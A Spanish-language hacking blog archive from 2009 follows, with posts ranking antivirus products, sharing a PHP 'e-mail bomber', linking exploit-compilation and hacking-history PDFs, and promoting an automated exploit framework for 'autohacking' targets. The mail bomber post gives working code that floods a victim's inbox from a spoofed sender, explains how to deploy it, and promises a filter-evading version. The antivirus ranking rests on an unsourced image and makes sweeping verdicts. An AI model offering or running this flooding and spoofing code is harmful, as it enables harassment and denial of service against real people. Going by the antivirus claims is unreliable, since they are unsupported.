27 ago 2009

Mejores Antivirus

Free Image Hosting at www.ImageShack.us


A la hora de elegir un antivirus siempre es difícil elegir uno ya que no tenemos idea cual es mejor...

Si me quieren odiar bien... pero la realidad es ésta: El mejor antivirus no es el que más cuesta ni nada... es al que menos goles le meten...

En un estudio hecho, se probaron los 40 antivirus más conocidos (?) y se les puso a prueba con 60.000 virus de la última temporada.

Bueno... la imagen es bastante clara, osea mientras menos mejor, como ven ningún antivirus es infalible (obviamente), pero F-Secure se porta bastante bien (con una cantidad increíble de solo 25 virus que lo vulneraron) por lo cual me atrevo a decir:

F-secure es el mejor antivirus.

Kaspersky y Gdata se portan bastante bien también, sin pasar de las 3 cifras (40 y 81 virus solamente pasaron).

Un aplauso para F-Secure, Kaspersky y Gdata y realmente una verguenza ViRobot que todavia le pasa el "Elk Cloner", "Melissa" y "ILOVEYOU", que todavía le causa dolores de cabeza el "sasser", definitivamente Virobot no debe estar en el mercado y debería ser prohibida su venta y distribución, es uno de los muchos antivirus "chantas" que solo tienen un fin lucrativo; ViRobot dedícatate a hacer paginas web mejor que los virus no son lo suyo.

Otros antivirus que dejaron bastante que desear son nProtect, Ikarus, Prevx, ClamAV, CAT-QuickHeal, eTrust-Vet y Sunbelt.

Entonces con todo esto podemos hacer un recomendación en general:

Mejores antivirus:
  • F-Secure
  • Kaspersky
  • Gdata
Antivirus que por nada del mundo deben estar en tu PC:
  • ViRobot
  • nProtect
  • Ikarus
  • Prevx
  • ClamAV
  • CAT-QuickHeal
  • eTrust-Vet
  • Sunbelt


Mejores antivirus, Mejor antivirus, peores antivirus, peor antivirus.

26 ago 2009

E-mail Bomber en PHP


Bien.. la imagen es bastante clara pero entremos a explicar un poco...
<?php
$i=1;
do {
mail("[email protected]", "Asunto del tema", "Aquí el mensaje", "[email protected]");
} While ($i > 0);
?>

Lo que hace este simple código en PHP es generar un un loop infinito ya que el while se va mantener siempre y cuando que i sea mayor a 0, osea siempre porque i es 1.
do {
Código que se repite infinitas veces...
} While ($i > 0);

Después está la función mail (aunque no lo crean sirve para enviar e-mails :O).
mail("[email protected]", "Asunto del tema", "Aquí el mensaje", "[email protected]");

[email protected]= el mail de la persona a la cual envías el mail.
Asunto del tema= El asunto de tu mail.
Aquí el mensaje= Aquí se pone el mensaje en formato texto que quieras enviarle (si quieres enviarle HTML investiga más, pero espero explicar pronto).
[email protected]= Aquí va el e-mail del que supuestamente lo envía... surge la pregunta ¿Puedo suplantar cualquier mail?... La respuesta es SÍ. Pueden poner cualquier mail aunque no exista (eso es lo único que está mal en la imagen ya que dice que tiene que existir... FALSO)

Una vez que modifican su código para lo que uds quieran, lo tienen que subir a un hosting que soporte PHP (yo creo que todos XD) y SMTP (el hosting que yo uso me restringe a 150 mails XS), lo ejecutan y listooo... Se van a enviar infintos e-mails a una velocidad impresionante.

Bien... Cabe destacar que esté es un code muy simple y que los principales servidores de mensajería instantanea (GMail y Hotmail) detectan el emisor del email y los adjuntan como 1 solo mensaje, pero prometo subir otro code que con un random cambia el emisor y llegan como e-mails independientes a la bandeja de entrada (osea dejan la grande... XD).

Fuente: No me acuerdo de donde saqué la imagen XS.

Esop... SAlu2
ZioneR







25 ago 2009

Compilación e interpretación de Exploits en PHP, Perl, Phyton, C & C++

,Bien... Considero muy necesario saber como compilar exploits. Para ello les traigo un PDF que explica muy didácticamente como compilar exploits en:
  • PHP
  • Perl
  • Phyton
  • C
  • C++
Descarga (Directa)
Descarga RapidShare
Descarga MEGAUPLOAD

Fuente: www.cygog.com.ar
Autor: Cygog
Email: [email protected]

Un viaje en la historia del hacking

Uno siempre se pregunta ¿Quienes son los primeros Hackers? ¿Los mejores? ¿Cómo son? ¿Como piensan?... y bueno, en la red hay mucha información, pero toda muy subjetiva y todas tienen puntos de vista distintos...

Aquí les presento un documento PDF con la historia del Hacking, sus proceres, etc... Disfrútenlo:

Download (Descarga Directa)
Download RapidShare
Download MEGAUPLOAD

Fuente: http://www.lpmagazine.org/
",'winAUTOPWN: framework de exploits'));

winAUTOPWN: framework de exploits

Ahora puedes dormir ??? (NOW YOU CAN SLEEP)... Sí, ese es el lema de la herramienta winAUTOPWN que es un framework de exploits.

Ahora... que es un framework ???
"Un framework, es una estructura de soporte definida, mediante la cual otro proyecto de software puede ser organizado y desarrollado. Típicamente, puede incluir soporte de progrmas, bibliotecas y un lenguaje interpretado entre otros software para ayudar a desarrollar y unir los diferentes componentes de un proyecto."
Osea, es un interprete y biblioteca (compilado) de exploits... Ahora lo interesante de este framework es que promete mucho, una de sus características más notables es el AutoHack.
Ahora unas pequeñas características:
  • AutoHack a tus objetivos con la menor interacción posible.
  • Contiene ya personalizados y compilados exploits.
  • No hay necesidad de modificar o compilar el código fuente de los exploits.
  • Escanea todos los puertos del 1 al 65535 después de tomar la dirección IP y prueba todos los exploits posibles de acuerdo a la lista de los puertos abiertos en (OpenPorts.TXT)
  • Puede ser utilizado también para probar la eficacia de IDS / IPS
  • Corre los exploits de manera independientes y no requiere de registrarse.
  • Es Gratis y de código libre !!!
  • Se actualiza muy a seguido.
"El objetivo de la creación de winAUTOPWN no es competir con los ya exitentes frameworks como, Core Impact (Pro), Immunity Canvas, Metasploit Framework (freeware), etc. quien ofrece mejor autohacks, sino para crear un país libre, rápido, aplicación independiente que es fácil de uso y no requiere de mucho apoyo de otras dependencias."

Requisitos para usar el WinAUTOPWN:
  • Tener instalado Interprete Perl, PHP, Python.
  • Y algunos archivos DLL de Cygwin especificados en el Readme.
Screenshoots:




Sitio Oficial:
http://winautopwn.co.nr/
Zona Descarga:
http://118.94.162.244/w/Downloads.html


Salu2
ZioneR

24 ago 2009

Contacto

Si tienes información de relevancia, aportes, manuales, páginas webs relacionadas con el tema, dudas, reclamos, peticiones, agradecimientos, etc... por favor hacerlo vía e-mail:

O pueden rellenar el siguiente formulario:

Blackploit al aire !!!

Se abre el Blog Blackploit !!!

Con este lugar virtual se prentederá aportar con toda o gran parte de la información circundante por en la red relacionada con la seguridad informática, de manera de poder hacer de éste un compilado general sobre informática y todas sus sub-clasificaciones.
En este Blog se pondrá especial atención a lo referido a:
  • (In)Seguridad Informática
  • Hacking
  • Defacing
  • Malaware
  • Bugs/Exploits
  • Exploits
  • Programación
  • Herramientas
  • Scripts
  • Manuales/Tutoriales
  • Noticias
  • Nuevas técnicas
  • Y más...
El Webmaster es agradecerá mucho a quienes aporten ideas, información, links de interés, aportes, manuales/tutoriales, otras web de informática... La manera correcta de hacerlo será publicándolo como comentario en algún post o mejor vía e-mail, para ello ir a zona Contacto.

Agradece a Uds
ZioneR

Salu2 a todos y espero que este blog surja... :D

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.